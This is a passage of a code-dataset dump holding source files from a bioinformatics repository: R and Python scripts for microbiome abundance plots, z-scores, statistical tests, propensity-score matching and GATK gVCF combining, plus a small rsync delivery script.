\"NCA vs AMI\" = c( No.sig = \"#ffffff\", \"P<0.05\" = \"#9bc67a\" , \"P<0.01\" = \"#009845\"),\n \"sCAD vs AMI\" = c( No.sig = \"#ffffff\", \"P<0.05\" = \"#9bc67a\" , \"P<0.01\" = \"#009845\"))\npheatmap(dt, cluster_rows = F, color = colorRampPalette(c(\"navy\", \"white\", \"firebrick3\"))(50), annotation_col=col_anno, annotation_colors = ann_colors,fontsize = 8, cellheight = 20, cellwidth = 20, filename = 'five_species_zscore.pdf', width = 10, height = 8)\n\n"
},
{
"alpha_fraction": 0.5960264801979065,
"alphanum_fraction": 0.6063281893730164,
"avg_line_length": 27.3125,
"blob_id": "4006232ec7d4aaae10ce28b52689e4e182e5a59f",
"content_id": "4799a52312e77ccc78143ada473d37b6d28b0929",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1359,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 48,
"path": "/rat/pvalue.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python3\nimport pandas as pd\nimport glob,re\nlst = ['F_shannon','M_shannon','F_number','M_number']\nfor item in lst:\n\tsex = item.split('_')[0]\n\tarf = item.split('_')[1]\n\n# homogeneity p value\n\tfor time in ['expose','recovery']:\n\t\tprefix = sex + time +'_homogeneity_' + arf\n\t\tfilename = prefix + '.txt'\n\t\twith open(filename, 'r') as homogeneity:\n\t\t\tdt = pd.read_table(homogeneity, header=0, index_col=0)\n\t\t\thomogeneity_p = dt['Pr(>F)'][1]\n\t\t\tprint(prefix + ':')\n\t\t\tprint(homogeneity_p)\n#normality\n\tfor time in ['expose','recovery']:\n\t\tprefix = sex + time + '_normality_' + arf\n\t\tfilename = prefix + '.txt'\n\t\twith open(filename, 'r') as normality:\n\t\t\tdt = pd.read_table(normality, header=0, index_col=0)\n\t\t\tnormality_p = dt['p.value'][0]\n\t\t\tprint(prefix + ':')\n\t\t\tprint(normality_p)\n\t\n# annova\n\tfor time in ['expose','recovery']:\n\t\tprefix = sex + time + '_anova_' + arf\n\t\tfilename = prefix + '.txt'\n\t\twith open(filename, 'r') as anova:\n\t\t\tdt = pd.read_table(anova, header=0, index_col=0)\n\t\t\tanova_p = dt['Pr(>F)'][0]\n\t\t\tprint(prefix + ':')\n\t\t\tprint(anova_p)\n\n# Tukey\n\tfor time in ['expose','recovery']:\n\t\tprefix = sex + time +'_Tukey_' + arf\n\t\tfilename = prefix + '.txt'\n\t\twith open(filename, 'r') as Tukey:\n\t\t\tdt = pd.read_table(Tukey, header=0, index_col=0)\n\t\t\tTukey_p = dt['Group.p adj']\n\t\t\tprint(prefix + ':')\n\t\t\tprint(Tukey_p)\n\n\tprint('========')\n"
},
{
"alpha_fraction": 0.6278538703918457,
"alphanum_fraction": 0.6360730528831482,
"avg_line_length": 34.32258224487305,
"blob_id": "fa17f281511122072da4644a59d0e28d8f32ff46",
"content_id": "bdafe242e9d69d9f048913b5a8bb9df8036abd09",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2242,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 62,
"path": "/rat/diff/FB_boxplt.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "import pandas as pd\n\n#F_expose\nF_expose = pd.read_table('F_expose_phylumProfileTable.xls', header=0, sep=\"\\t\", index_col = 0)\nF_expose_FB = F_expose.loc[['Firmicutes']]/F_expose.loc[['Bacteroidetes']].values # 两行相除,这个用法需要记住\nF_expose_FB.index = ['FB']\nF_expose_FB_T = F_expose_FB.T\n\n#M_expose\nM_expose = pd.read_table('M_expose_phylumProfileTable.xls', header=0, sep=\"\\t\", index_col = 0)\nM_expose_FB = M_expose.loc[['Firmicutes']]/M_expose.loc[['Bacteroidetes']].values\nM_expose_FB.index = ['FB']\nM_expose_FB_T = M_expose_FB.T\n\n#F_recovery\nF_recovery = pd.read_table('F_recovery_phylumProfileTable.xls', header=0, sep=\"\\t\", index_col = 0)\nF_recovery_FB = F_recovery.loc[['Firmicutes']]/F_recovery.loc[['Bacteroidetes']].values\nF_recovery_FB.index = ['FB']\nF_recovery_FB_T = F_recovery_FB.T\n\nM_recovery = pd.read_table('M_recovery_phylumProfileTable.xls', header=0, sep=\"\\t\", index_col = 0)\nM_recovery_FB = M_recovery.loc[['Firmicutes']]/M_recovery.loc[['Bacteroidetes']].values\nM_recovery_FB.index = ['FB']\nM_recovery_FB_T = M_recovery_FB.T\n\nmerge = pd.concat([F_expose_FB_T,M_expose_FB_T,F_recovery_FB_T,M_recovery_FB_T])\nmerge.to_csv('F_B_ratio.txt', sep=\"\\t\")\n\nimport re\nwith open('F_B_ratio.txt','r') as IN, open('F_B_ratio_boxplot.txt','w') as out:\n\thead = IN.readline().strip('\\n').split('\\t')[1]\n\tprint('SampleID\\t' + head + '\\tsubgroup\\tgroup', file=out)\n\tfor line in IN:\n\t\tlst = line.strip('\\n').split('\\t')\n\t\tif not lst[0].endswith('-a'):\n\t\t\tif re.match('Cig\\-F', lst[0]):\n\t\t\t\tsubgroup = 'Cigarette'\n\t\t\t\tgroup = 'F_expose' # 根据命名分组,不具有普适性... \n\t\t\telif re.match('Cig\\-M', lst[0]):\n\t\t\t\tsubgroup = 'Cigarette'\n\t\t\t\tgroup = 'M_expose'\n\t\t\telif re.match('EL\\-F', lst[0]):\n\t\t\t\tsubgroup = 'E-liquid'\n\t\t\t\tgroup = 'F_expose'\n\t\t\telse:\n\t\t\t\tsubgroup = 'E-liquid'\n\t\t\t\tgroup = 'M_expose'\n\t\telse:\n\t\t\tif re.match('Cig\\-F', lst[0]):\n\t\t\t\tsubgroup = 'Cigarette'\n\t\t\t\tgroup = 'F_recovery'\n\t\t\telif re.match('Cig\\-M', lst[0]):\n\t\t\t\tsubgroup = 'Cigarette'\n\t\t\t\tgroup = 'M_recovery'\n\t\t\telif re.match('EL\\-F', lst[0]):\n\t\t\t\tsubgroup = 'E-liquid'\n\t\t\t\tgroup = 'F_recovery'\n\t\t\telse:\n\t\t\t\tsubgroup = 'E-liquid'\n\t\t\t\tgroup = 'M_recovery'\n\t\toutline = '\\t'.join([lst[0],lst[1],subgroup,group])\n\t\tprint(outline, file=out)\n"
},
{
"alpha_fraction": 0.6520717740058899,
"alphanum_fraction": 0.6621102094650269,
"avg_line_length": 40.43362808227539,
"blob_id": "965e0a0614c6cd2ac505088a4dd1e04dd8379247",
"content_id": "55d4124bf6357d18a6d8f023b42bacc4c86363cd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4706,
"license_type": "no_license",
"max_line_length": 546,
"num_lines": 113,
"path": "/barplot.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python3 \nimport argparse,re\nparser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description='''\n-------------------\nSimple Introduction:\ngenerate the barplot based on abundance file.\nExample: python3 barplot.py -i phylumProfileTable.xls -o Process -r 0.01\nTo be continued.\n------------------'''\n)\n#parser = argparse.ArgumentParser(description = \"based on the abundance file,get the tax ID for with relative abundance bigger than some value(eg: 0.01) at least in one sample, tax with relative abundance less than this values will be merged as others in next step.\")\n#parser = argparse.ArgumentParser(description = \"based on the abundance file,get the tax ID for with abundance bigger than some value(eg: 0.01) at least in one sample, for the x axis text of barplot of before and after two groups...not very clear.\") +_+|| 确实没看懂..\nparser.add_argument('-i','--Input', help = \"the input file\")\nparser.add_argument('-r','--rate', help = \"the value for selecting tax ID, default in 0.\", nargs='?')\nparser.add_argument('-o','--Output', help = \"the output directory\")\nargs=parser.parse_args()\n(Input,Output) = (args.Input,args.Output)\n\nrate = args.rate if args.rate else 0\n\nif not Input or not Output:\n\tparser.print_help() \n\texit()\n\n'''\nimport os,shutil\nif os.path.exists(Output):\n\tshutil.rmtree(Output)\nos.makedirs(Output)\n'''\n\n# get the tax ID needed!\nmatch = re.match('(.*)ProfileTable',Input.split(\"/\")[-1])\nlevel = match.group(1)\nIDlist = list()\nwith open(Input,'r') as IN:\n\tIN.readline()\n\tfor line in IN:\n\t\tlst = line.strip('\\n').split('\\t')\n\t\tfor index in range(1,len(lst)):\n\t\t\tif float(lst[index]) > float(rate) :\n\t\t\t\tIDlist.append(lst[0])\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tcontinue\n\n# output the barplot.txt file\noutfile = Output +'/' + level + \"Barplot.txt\"\nwith open(Input, \"r\") as IN, open(outfile, \"w\") as out:\n\tout.write('individual\\tlevel\\tabundance\\n')\n\thead = IN.readline().strip('\\n').split('\\t')\n\tDict = dict()\n\tfor element in head[1:]:\n\t\tDict[element] = 0\n\tfor line in IN:\n\t\tlst = line.strip('\\n').split('\\t')\n\t\ttaxonomy = lst[0]\n\t\tfor index in range(1,len(lst)):\n\t\t\tif taxonomy not in IDlist:\n\t\t\t\tDict[head[index]] = Dict[head[index]] + float(lst[index])\n\t\t\telse:\n\t\t\t\tkey = head[index] + \"\\t\" + taxonomy + \"\\t\" + lst[index]\n\t\t\t\tDict[key] = head[index]\n\tfor key in Dict:\n\t\tif key in head and Dict[key] == 0:\n\t\t\tcontinue\n\t\telif key in head:\n\t\t\tout.write(key + '\\tOthers\\t' + str(Dict[key]) + '\\n')\n\t\telse:\n\t\t\tkeys = key.split('\\t')\n\t\t\tindiv = keys[0]\n\t\t\ttaxonomy = keys[1]\n\t\t\tabund = keys[2]\n\t\t\tout.write(indiv + '\\t' + taxonomy + '\\t' + abund + '\\n')\n\n# get the taxID order and sampleID order for drawing barplot\nimport pandas as pd\ndt = pd.read_table(outfile)\ntax_order = list(dt.groupby('level').abundance.mean().sort_values(ascending=False).index)\nif 'Others' in tax_order:\n\ttax_order.remove('Others')\n\ttax_order.append('Others')\nsample_order = list(dt.loc[dt['level'] == tax_order[0]].groupby('individual').abundance.mean().sort_values().index)\n\n#generate barplot Rscript\ncolor_list = list()\nwith open('color.txt', 'r') as color:\n\tcolor_list = color.read().split('\\n') # 一次性读取文件\n\ncolor_list.pop(-1)\ncolor_list = color_list[:len(tax_order)]\nplot_tax_order = ','.join(['\"' + x + '\"' for x in tax_order])\nplot_sample_order = ','.join(['\"' + x + '\"' for x in sample_order])\nplot_color = ','.join(['\"' + x + '\"' for x in color_list])\noutplot = Output +'/' + level + 'Barplot.pdf'\nplot_script = Output +'/' + level + 'ProfileBarplot.R'\nwith open(plot_script, 'w') as rscript:\n\tprint('#! /usr/bin/Rscript', file=rscript)\n\tprint('dt = read.table(\"' + outfile + '\",header = T, sep = \"\\\\t\")', file=rscript)\n\tprint('library(ggplot2)', file=rscript)\n\tprint('sampleID = c(' + plot_sample_order + ')', file=rscript)\n\tprint('legendID = c(' + plot_tax_order + ')', file=rscript)\n\tprint('color = c(' + plot_color + ')', file=rscript)\n\tprint('dt$individual_order = factor(dt$individual, level=sampleID)', file=rscript)\n\tprint('ggplot(dt,aes(x=dt$individual_order,y=dt$abundance,fill=factor(dt$level,levels=rev(legendID)))) + geom_bar(stat = \"identity\", color = \"#56666B\", size = 0.1) + labs(x = \"Inidividuals\", y = \"Relative Abundance\") + theme_bw() + theme(axis.title = element_text(size = 12), axis.text = element_text(colour = \"black\", size = 10), axis.text.x = element_text(hjust = 1,angle=65,color=\"black\"),legend.title = element_blank(),legend.key.size=unit(3,\"mm\"), legend.text=element_text(size=10)) + scale_fill_manual(values = rev(color))', file=rscript)\n\tprint('ggsave(\"' + outplot + '\", width=6, height=4)', file=rscript)\n\tprint('unlink(\"Rplots.pdf\")', file=rscript)\n\n# plot \nimport os\nos.system('Rscript ' + plot_script)\n"
},
{
"alpha_fraction": 0.5824432373046875,
"alphanum_fraction": 0.5931241512298584,
"avg_line_length": 41.197181701660156,
"blob_id": "3cd3f936ca9abb96ca09a84276c246ac1446ad18",
"content_id": "3d4810be8475e79ff881c718eb630ad6977537ea",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2996,
"license_type": "no_license",
"max_line_length": 295,
"num_lines": 71,
"path": "/run_Combine_gvcf.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python3\nimport argparse,re,os,math,glob\nparser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description='''\n-------------------\nSimple Introduction:\nCombine the gvcf files into vcf file.\nExample: python3 run_Combine_gvcf.py -i allSample.list -t intervals.list -r gvcfDir.list -o Test -q qsub.sh\nTo be continued.\n------------------'''\n)\nparser.add_argument('-i','--Input', help = \"the sampleID file.\")\nparser.add_argument('-t','--Interval', help = \"the intervals list file.\")\nparser.add_argument('-r','--gvcf', help = \"the gvcf file directory list file.\")\nparser.add_argument('-o','--outdir', help = \"the outdir.\")\nparser.add_argument('-q','--qsub', help = \"the final qsub file.\")\nparser.add_argument(\"-v\", \"--version\",action='version', version='%(prog)s 1.0')\nargs = parser.parse_args()\nsampleList = args.Input\nintervalsList = args.Interval\ngvcfDir = args.gvcf\noutdir = args.outdir\nqsub = args.qsub\npar = [sampleList,intervalsList,gvcfDir,outdir,qsub]\n\nif not all(par):\n parser.print_help()\n exit()\n\nif os.path.isfile(qsub):\n os.remove(qsub)\n\nSampleDir = dict()\nwith open(gvcfDir,'r') as IN:\n for line in IN:\n gvcf_dir = line.strip('\\n')\n for item in glob.glob(gvcf_dir + '/*'):\n key = item.split('/')[-1]\n SampleDir[key] = gvcf_dir\n\nwith open(intervalsList,'r') as IN:\n for line in IN:\n interLine = line.strip('\\n')\n Chr = interLine.split('/')[-2]\n chrdir = '/'.join([outdir,Chr])\n\n if not os.path.isdir(chrdir):\n os.makedirs(chrdir)\n\n gvcfs = ''\n with open(sampleList,'r') as Sample:\n for sampleline in Sample:\n sampleID = sampleline.strip('\\n')\n gatkName = '.'.join([sampleID,Chr,'g.vcf.gz'])\n if sampleID in SampleDir:\n eachGvcf = '/'.join([SampleDir[sampleID],sampleID,'callGVCF_GATK',gatkName])\n else:\n print('Error: sample ID: ' + sampleID + ' is not in the gvcf dir,please check your file.')\n gvcfs = gvcfs + \" --variant \" + eachGvcf\n prefix = os.path.basename(interLine).replace(\".intervals\", \"\")\n outgvcf = chrdir + \"/\" + prefix + \".g.vcf.gz\"\n shell = chrdir + \"/CombineGvcf_\" + prefix + \".sh\"\n with open(shell,'w') as out:\n out.write('set -e\\necho Start at : `date`\\n')\n shell_line = \" \".join([\"java -Xmx10g -Djava.io.tmpdir=\" + outdir, \"-jar /zfssz2/BC_COM_P7/F17HTSCCWLJ1810/HUMqqmR/s8.gvcf/bin/GenomeAnalysisTK.jar -R /zfssz2/BC_COM_P7/F17HTSCCWLJ1810/HUMqqmR/s8.gvcf/hg19_fa/hg19.fasta -T CombineGVCFs\", gvcfs, \"-o\", outgvcf, \"-L\", interLine]) + \"\\n\"\n out.write(shell_line)\n out.write(\"echo End at : `date`\\n\")\n out.write(\"echo Work is completed! > \" + shell + \".sign\\n\")\n with open (qsub,'a') as out:\n out.write(\"qsub -o %s -e %s -l vf=2G,p=1 -q bc.q -P HUMrqkR %s\\n\" % (chrdir, chrdir, shell))\n"
},
{
"alpha_fraction": 0.7397260069847107,
"alphanum_fraction": 0.7511415481567383,
"avg_line_length": 35.5,
"blob_id": "f7132b210c61114f6de4fa4928e32728e8b28c14",
"content_id": "3de40858e4cddb402303fdc1a631f860db8b4c70",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 438,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 12,
"path": "/data_delivery_rsyncs.sh",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /bin/bash\n#exampel sh data_delivery_rsyncs.sh file.list Temp account password IP\nlist_file=$1 #file_path or dir_path (permit the soft link each line\ndest_dir=$2 #the destination directory\naccount=$3 #your account\npassword=$4 #your password\nip=$5 #destination IP\ncat $list_file | while read line\ndo\necho \"Processing file:rsync the $line to $dest_dir\"\nexpect data_delivery_rsync.expect $line $dest_dir $account $password $ip\ndone\n"
},
{
"alpha_fraction": 0.6254545450210571,
"alphanum_fraction": 0.6545454263687134,
"avg_line_length": 44.83333206176758,
"blob_id": "be9f11ca3d5fe81b3f3787e6489efb72622c8b84",
"content_id": "64311cf533a3bac0436ad1f2b96d691253c899b4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 343,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 6,
"path": "/upset.R",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "library(UpSetR,lib.loc = \"/installpath/R_lib\") #指定加载包的路径\npdf(\"upset.pdf\", width=8,height=6, onefile = FALSE) #输出到 pdf 文件,并且取消第一页的空白页\ngene <- read.csv('Data/upset.csv', header = T, sep = '\\t') \nupset(gene, order.by = \"degree\", mb.ratio = c(0.70, 0.30))\ndev.off()\n# 就这么简单,成图..\n"
},
{
"alpha_fraction": 0.6515804529190063,
"alphanum_fraction": 0.672773003578186,
"avg_line_length": 52.519229888916016,
"blob_id": "1bee60c6b5cc7975e396881bda16771f7573ca5e",
"content_id": "6468c393963c25f9b455a12ff86014652cdb5785",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3040,
"license_type": "no_license",
"max_line_length": 182,
"num_lines": 52,
"path": "/gout/group_barplot.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "\nimport pandas as pd\ndt = pd.read_table(\"Gout_10gene_phylum_abundance_profile.xls\", header = 0, index_col=0)\ngroup = pd.read_table(\"Sample_information_detail_drug_20180806.xls\", header = 0, index_col=0)\n\n#dt_melt.columns.values[0] = 'Tax'\n# 得到丰度前五的物种,将剩下的合并\ndt_melt = pd.melt(dt.reset_index(), id_vars='index', value_vars = list(dt.columns)[0:], var_name = 'SampleID', value_name = 'Abundance') \ntax_mean = dt_melt.groupby('index').mean().sort_values(by = 'Abundance', ascending = False)\ntax_retain = list(tax_mean.index[:5])\ntax_others = list(tax_mean.index[5:])\ndt_retain = dt.loc[tax_retain]\ndt_others = dt.loc[tax_others].sum().to_frame(name = 'Others').T\ndt_merge = pd.concat([dt_retain, dt_others])\n\n## 根据合并后的丰度表,生成画 barplot 的柱状图文件\n#ha = pd.melt(temp, id_vars = ['Description'], value_vars = list(temp.columns)[:-1], var_name = '', value_name = 'Abundance') \n# id_vars 表示不变的列名, value_vars 表示置换的列名,var_name 变化后的列名,这里是组名, value_name 是变化后的数值列名\ndt_merge_melt = pd.melt(dt_merge.reset_index(), id_vars='index', value_vars = list(dt_merge.columns)[0:], var_name = 'SampleID', value_name = 'Abundance') \ndt_merge_melt.columns.values[0] = 'Tax'# 这里有雷,melt 以后重命名,在更改列名,会出现无法调用的情况,待定\n#dt_merge_melt\n\n#获取分组名\nsample_group = group['SamplingTime'].to_frame().reset_index()\nsample_group.columns.values[0] = 'SampleID'\nbarplot_dt = pd.merge(dt_merge_melt, sample_group, left_on = 'SampleID', right_on = 'SampleID')\nbarplot_dt.to_csv('gout_phylum_barplot.txt', sep = '\\t', index = 0)\n\n# 得到画图的物种顺序\ncontrol = barplot_dt.loc[(barplot_dt['Tax'] == 'Bacteroidetes') & (barplot_dt['SamplingTime'] == 'Control')]\ncontrol_list = list(control.sort_values(by='Abundance')['SampleID'])\n\nT0 = barplot_dt.loc[(barplot_dt['Tax'] == 'Bacteroidetes') & (barplot_dt['SamplingTime'] == 'T0')]\nT0_list = list(T0.sort_values(by='Abundance')['SampleID'])\n\nT1 = barplot_dt.loc[(barplot_dt['Tax'] == 'Bacteroidetes') & (barplot_dt['SamplingTime'] == 'T1')]\nT1_list = list(T1.sort_values(by='Abundance')['SampleID'])\n\nT2 = barplot_dt.loc[(barplot_dt['Tax'] == 'Bacteroidetes') & (barplot_dt['SamplingTime'] == 'T2')]\nT2_list = list(T2.sort_values(by='Abundance')['SampleID'])\n\nT3 = barplot_dt.loc[(barplot_dt['Tax'] == 'Bacteroidetes') & (barplot_dt['SamplingTime'] == 'T3')]\nT3_list = list(T3.sort_values(by='Abundance')['SampleID'])\n\nsample_order = control_list + T0_list + T1_list + T2_list + T3_list\ntax_order = list(dt_merge.index)\n\n# R 画图的输入参数\nR_sample_order = \":\".join(sample_order)\nR_tax_order = \":\".join(tax_order)\nR_color_order = ':'.join([\"#99c885\", \"#e5abeb\", \"#e5ffb3\",\"#49e4f2\"]) # 来源网站\nwith open ('out.sh', 'w') as out:\n print('Rscript gout_group_barplot.R -i gout_phylum_barplot.txt -t ' + R_tax_order + ' -s ' + R_sample_order + ' -r Control:T0:T1:T2:T3 -c ' + R_color_order + ' -p gout_phylum')\n"
},
{
"alpha_fraction": 0.663339376449585,
"alphanum_fraction": 0.6687840223312378,
"avg_line_length": 80.62963104248047,
"blob_id": "13d1fb881d502fd92b73447d49e3ca172cb0c5f8",
"content_id": "c0b9944d41086aeb6006bab1efcbaba14e02928d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 2352,
"license_type": "no_license",
"max_line_length": 342,
"num_lines": 27,
"path": "/Phenotype/propensity_score.R",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "library(\"MatchIt\")\n\n# 获取 FS 匹配的 CS ,之所以选 FS 为「对照」组是因为它的样品数目最少,可以可其他两组最大化配对;\ndt = read.table('Samle_Information.xls', sep = '\\t', row.names = 1, header = T)\ndt = dt[c('Group','Age', 'BMI', 'Ethnicity','Gender','Married','Breakfast','Diet','Vegetable','Fruit','Meat','Dairy.products','Coarse.grain','Eggs','Drinking','Antibiotic','Mouthwash','Oral.ulcer','Bleeding.gums','Dental.caries','Pulpitis','Periodontitis','Constipation','Insomnia','Cold','Sore.throat')] #对所有这些因素进行综合评分挑选样品\ndt = dt[dt['Group'] != 'NS',]\ntemp = rownames(dt)\ndt = dt %>% mutate(Group = ifelse(Group == 'FS', 1, 0))\nrownames(dt)= temp\nm = matchit(Group ~ Age + BMI + Ethnicity + Gender + Married + Breakfast + Diet + Vegetable + Fruit + Meat + Dairy.products + Coarse.grain + Eggs + Drinking + Antibiotic + Mouthwash + Oral.ulcer + Bleeding.gums + Dental.caries + Pulpitis + Periodontitis + Constipation + Insomnia + Cold + Sore.throat ,data = dt,method =\"nearest\", ratio =1) \nmatched <- match.data(m)\ncs_id = rownames(matched[matched['Group'] == 0,])\n\n# 获取 FS 匹配的 NS\ndt = read.table('Samle_Information.xls', sep = '\\t', row.names = 1, header = T)\ndt = dt[c('Group','Age', 'BMI', 'Ethnicity','Gender','Married','Breakfast','Diet','Vegetable','Fruit','Meat','Dairy.products','Coarse.grain','Eggs','Drinking','Antibiotic','Mouthwash','Oral.ulcer','Bleeding.gums','Dental.caries','Pulpitis','Periodontitis','Constipation','Insomnia','Cold','Sore.throat')]\ndt = dt[dt['Group'] != 'CS',]\ntemp = rownames(dt)\ndt = dt %>% mutate(Group = ifelse(Group == 'FS', 1, 0))\nrownames(dt)= temp\nm = matchit(Group ~ Age + BMI + Ethnicity + Gender + Married + Breakfast + Diet + Vegetable + Fruit + Meat + Dairy.products + Coarse.grain + Eggs + Drinking + Antibiotic + Mouthwash + Oral.ulcer + Bleeding.gums + Dental.caries + Pulpitis + Periodontitis + Constipation + Insomnia + Cold + Sore.throat, data = dt,method =\"nearest\", ratio =1)\nmatched <- match.data(m)\nns_id = rownames(matched[matched['Group'] == 0,])\nfs_id = rownames(dt[dt['Group'] == '1',])\n\ndt = read.table('Samle_Information.xls', sep = '\\t', row.names = 1, header = T)\nwrite.table(dt[c(fs_id,cs_id,ns_id),], file = 'matched_Samle_Information.xls', sep = \"\\t\",quote = F) #输出配对后的表型信息表\n"
},
{
"alpha_fraction": 0.6582515239715576,
"alphanum_fraction": 0.6769518256187439,
"avg_line_length": 48.74418640136719,
"blob_id": "75d3a04235583f3ad1ea956036157bc50bb46f72",
"content_id": "0d05cd4a93c49ae8833650af568e72e1705d549b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2201,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 43,
"path": "/Temp/phylum_zscore.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "# 计算蔡军 门 水平的 Zscore\n## 计算 z core\ndt = pd.read_table('CJ_phylum_abd.txt', index_col=0)\ndt = dt.drop(['Tax_detail'], axis=1)\ngroup = pd.read_table('CJ_phylum_map.txt', index_col=0)\nfrom scipy.stats import zscore\ndt_z = dt.apply(zscore, ddof=1, axis=1).T ## 这行是用来计算 zscore\nControl_mean = dt_z.loc[group.loc[group['Description'] == 'Control'].index].mean().to_frame(name='Control')\nCHD_mean = dt_z.loc[group.loc[group['Description'] == 'CHD'].index].mean().to_frame(name='CHD')\nSTEMI_mean = dt_z.loc[group.loc[group['Description'] == 'STEMI'].index].mean().to_frame(name='STEMI')\nz_merge = pd.concat([Control_mean,CHD_mean,STEMI_mean], axis=1)\n\n# 提取差异物种 ID\nControl_CHD = pd.read_table('Phylum.Control-CHD.wilcox.test.xls', index_col=0)\nSTEMI_Control = pd.read_table('Phylum.STEMI-Control.wilcox.test.xls', index_col=0)\nSTEMI_CHD = pd.read_table('Phylum.STEMI-CHD.wilcox.test.xls', index_col=0)\n\nControl_CHD_diff = list(Control_CHD.loc[Control_CHD['qvalue'] < 0.05].index)\nSTEMI_Control_diff = list(STEMI_Control.loc[STEMI_Control['qvalue'] < 0.05].index)\nSTEMI_CHD_diff = list(STEMI_CHD.loc[STEMI_CHD['qvalue'] < 0.05].index)\ndiff_tax = Control_CHD_diff + STEMI_Control_diff + STEMI_CHD_diff\ndiff_tax = list(set(diff_tax)) # 去重复\nz_plot = z_merge.loc[diff_tax].T\nz_plot.to_csv('CJ_zscore_phylum.txt', sep=\"\\t\")\n\n#注释的表格\ntemp = STEMI_Control.loc[STEMI_Control['qvalue'] < 0.05]['qvalue'].to_frame()\nlabel = [ 'p_png' if x < 0.01 else 'lessp_png' for x in temp['qvalue']]\ntemp['Control vs STEMI'] = label\nSTEMI_Control_p = temp.drop(['qvalue'], axis=1)\n\ntemp = Control_CHD.loc[Control_CHD['qvalue'] < 0.05]['qvalue'].to_frame()\nlabel = [ 'p_png' if x < 0.01 else 'lessp_png' for x in temp['qvalue']]\ntemp['Control vs CHD'] = label\nControl_CHD_p = temp.drop(['qvalue'], axis=1)\n\ntemp = STEMI_CHD.loc[STEMI_CHD['qvalue'] < 0.05]['qvalue'].to_frame()\nlabel = [ 'p_png' if x < 0.01 else 'lessp_png' for x in temp['qvalue']]\ntemp['CHD vs STEMI'] = label\nSTEMI_CHD_p = temp.drop(['qvalue'], axis=1)\n\nall_p = pd.concat([STEMI_Control_p,Control_CHD_p,STEMI_CHD_p], axis=1)\nall_p.fillna('no_sig_png').to_csv('CJ_phylum_annotation_col.txt', sep='\\t')\n"
},
{
"alpha_fraction": 0.6695442199707031,
"alphanum_fraction": 0.6909530162811279,
"avg_line_length": 35.20000076293945,
"blob_id": "cb93c6b25a62e3131d6486efa5351bd683e1041f",
"content_id": "0fbdb9f80972d2f355a763ccb96d049bd0d9aa12",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3090,
"license_type": "no_license",
"max_line_length": 133,
"num_lines": 80,
"path": "/geneInsample.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#得到基因丰度表以后,计算基因在样本中的存在情况,如至少在 10% 的样本存在的基因有多少,20%,30%... 以此类推, 并且按照需要输出低于某一阈值的基因 ID, 用来后续分析的过滤,如在少于 10% 样品中存在的基因 ID.\n\n#!/usr/bin/python3\nimport pandas as pd\nimport argparse\nimport matplotlib\nmatplotlib.use('Agg') # 不加这个画图的时候会报错\n\nparser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description='''\n-------------------\nSimple Introduction:\nCalculate the the number of genes beyond some threshold(eg:exist in 10%, 20%.. of all sample)\nExample: python3 geneInsample.py -i GeneCatalog_profile.xls.gz\nabundance file > 5G needs vf > 20G.\nTo be continued.\n------------------'''\n)\nparser.add_argument('-i','--Input', help = \"the abundance file.\")\nparser.add_argument('-o','--outdir',help = \"the output directory,default is current working directory.\",nargs='?')\nparser.add_argument(\"-v\", \"--version\",action='version', version='%(prog)s 1.0')\nargs=parser.parse_args()\nabdfile = args.Input\noutdir = args.outdir if args.outdir else '.'\noutpath = outdir + '/geneInsample.txt'\n\nif abdfile.endswith('gz'):\n df = pd.read_csv(abdfile, compression='gzip', header=0, sep='\\t')\nelse:\n df = pd.read_csv(abdfile, header=0, sep='\\t')\n\ndf.columns.values[0] = 'geneID'\ndf = df.set_index('geneID')\ntotalsample = len(df.columns)\nsampleNum = (df!=0).sum(axis=1) # the sample numers of each gene, including genes exist in no samples\ngeneOf_0 = sum(sampleNum == 0) # judge the genes number exist in no samples\n# error\nif geneOf_0:\n\tprint(\"some genes do not exist in all samples! please check your file!\\nThe corresponding gene numbers is \" + str(geneOf_0) + ' :)')\n\t#exit()\nelse:\n\tnext\n\ntotalGene = sum(sampleNum != 0)\n\nout = open (outpath,'w')\nout.write('\\t'.join(['threshold','sampleNumber','geneNumber','rate']) + '\\n')\nout.write('\\t'.join(['>0', '1', str(totalGene), '1']) + '\\n')\nfor x in range(10,91,10):\n\tthreshold = '>=' + str(x) + '%'\n\tsampleNumber = int(totalsample*(x/100)) + 1\n\tgeneNumber = len(sampleNum[sampleNum >= sampleNumber])\n\tgeneRate = 